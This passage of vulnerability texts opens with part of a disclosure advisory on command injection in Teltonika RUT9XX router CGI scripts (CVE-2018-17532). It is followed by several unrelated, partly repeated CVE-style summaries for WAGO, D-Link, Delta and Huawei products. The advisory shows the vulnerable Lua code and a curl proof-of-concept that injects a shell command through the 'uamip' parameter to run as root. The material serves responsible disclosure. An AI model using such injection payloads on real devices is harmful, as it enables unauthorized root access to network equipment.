`get_ifname` and `getParam`. Occasionally, it also insecurely uses `os.execute` directly: ```lua [...] if send and send ~= "" and tel_num then local ifname = get_ifname(uamip) local pass = generate_code(ifname) or "0000" tel_num = tel_num:gsub("%%2B", "+") local exists = getParam("grep \"" ..tel_num.. "\" /etc/chilli/" .. ifname .. "/smsusers") local user = string.format("%s", pass) local uri = os.getenv("REQUEST_URI") local message = string.format("%s Password - %s \n Link - http://%s%s?challenge=%s&uamport=%s&uamip=%s&userurl=%s&UserName=%s&button=1", tel_num, pass, uamip, uri, challenge, uamport, uamip, userurl, pass) local smsotp_mesg=string.format("%s;%s", tel_num, pass) message = getParam(string.format("/usr/sbin/gsmctl -Ss \"%s\"", message)) if message == "OK" then os.execute("echo \""..smsotp_mesg.."\" >> /tmp/smsotp.log") sms = "sent" if exists then os.execute("sed -i 's/" ..exists.. "/" ..user.. "/g' /etc/chilli/" .. ifname .. "/smsusers") else os.execute("echo \"" ..user.. "\" >>/etc/chilli/" .. ifname .. "/smsusers") end [...] ``` In one of the first lines of the above code snippet, `hotspotlogin.cgi` calls `get_ifname` with unsanitized user input from the parameter `uamip`. A few lines later it calls `getParam` with unsanitized user input from the parameter `TelNum`. In a further call to `getParam` it uses more unsanitized user input. There are futher locations that call insecure functions like `debug` and `get_ifname` either directly or indirectly with user input from the scripts `autologin.cgi` and `hotspotlogin.cgi`. ## Proof-of-Concept ## For example, an attacker can exploit this vulnerability by manipulating the `uamip` parameter: ```sh curl -v -o /dev/null "http://$IP/cgi-bin/hotspotlogin.cgi" -d 'send=1&uamip="; id >/tmp/test #' ``` The device executes the commands with root privileges: ```bash # cat /tmp/test uid=0(root) gid=0(root) ``` ## Timeline ## * `2018-03-19` identification of vulnerability in version RUT9XX_R_00.04.84 * `2018-04-10` detailed analysis of version RUT9XX_R_00.04.161 * `2018-04-16` re-test of version RUT9XX_R_00.04.172 * `2018-04-16` initial vendor contact through public address * `2018-04-18` vendor response with security contact * `2018-04-19` disclosed vulnerability to vendor security contact * `2018-04-26` vendor released fix in version RUT9XX_R_00.04.233 * `2018-07-09` re-test of version RUT9XX_R_00.05.00.5 * `2018-09-25` request CVE from MITRE * `2018-09-26` MITRE assigned CVE-2018-17532 * `2018-10-11` public disclosure ## References ## * Firmware Changelog: <https://wiki.teltonika.lt/index.php?title=RUT9xx_Firmware> ## Credits ## * David Gnedt ([SBA Research](https://www.sba-research.org/))

WAGO 750-88X and WAGO 750-89X Ethernet Controller devices, versions 01.09.18(13) and before, have XSS in the SNMP configuration via the webserv/cplcfg/snmp.ssi SNMP_DESC or SNMP_LOC_SNMP_CONT field. WAGO 750-881 Ethernet Controller The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. WAGO750-881EthernetControllerdevices is an Ethernet controller device from WAGO, Germany. The remote attacker can use the SNMP_DESC or SNMP_LOC_SNMP_CONT field to inject any web script or HTML. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code

D-LinkDIR-601 is a popular 150M household product. D-LinkDIR601 has a certificate disclosure vulnerability. An attacker can exploit the vulnerability to retrieve sensitive information about device configuration and management credentials.

The D-LinkDSL-2750B is an ADSL router. There is an OS command injection vulnerability in the D-LinkDSL-2750B. An attacker can exploit the vulnerability to execute arbitrary commands.

The D-LinkDSL-2750B is an ADSL router. There is an OS command injection vulnerability in the D-LinkDSL-2750B. An attacker can exploit the vulnerability to execute arbitrary commands.

In Delta Industrial Automation TPEditor, TPEditor Versions 1.90 and prior, multiple out-of-bounds write vulnerabilities may be exploited by processing specially crafted project files lacking user input validation, which may cause the system to write outside the intended buffer area and may allow remote code execution. Delta Industrial Automation TPEditor Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation TPEditor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of TPE files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code under the context of the current process. Delta Industrial Automation TPEditor is a Windows-based Delta text panel programming software from Delta Electronics. Failed exploit attempts will likely result in denial-of-service conditions

In Delta Industrial Automation TPEditor, TPEditor Versions 1.90 and prior, multiple stack-based buffer overflow vulnerabilities may be exploited by processing specially crafted project files lacking user input validation before copying data from project files onto the stack and may allow an attacker to remotely execute arbitrary code. Delta Industrial Automation TPEditor Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation TPEditor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of project files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Delta Industrial Automation TPEditor is a Windows-based Delta text panel programming software from Delta Electronics. Failed exploit attempts will likely result in denial-of-service conditions

Huawei Mate 10 pro smartphones with the versions before BLA-AL00B 8.1.0.326(C00) have an improper authentication vulnerability. App Lock is a function to prevent unauthorized use of apps on smartphones, an attacker could directly change the lock password after a series of operations. Successful exploit could allow the attacker to use the application which is locked. HuaweiMate10Pro is a smartphone product from China's Huawei company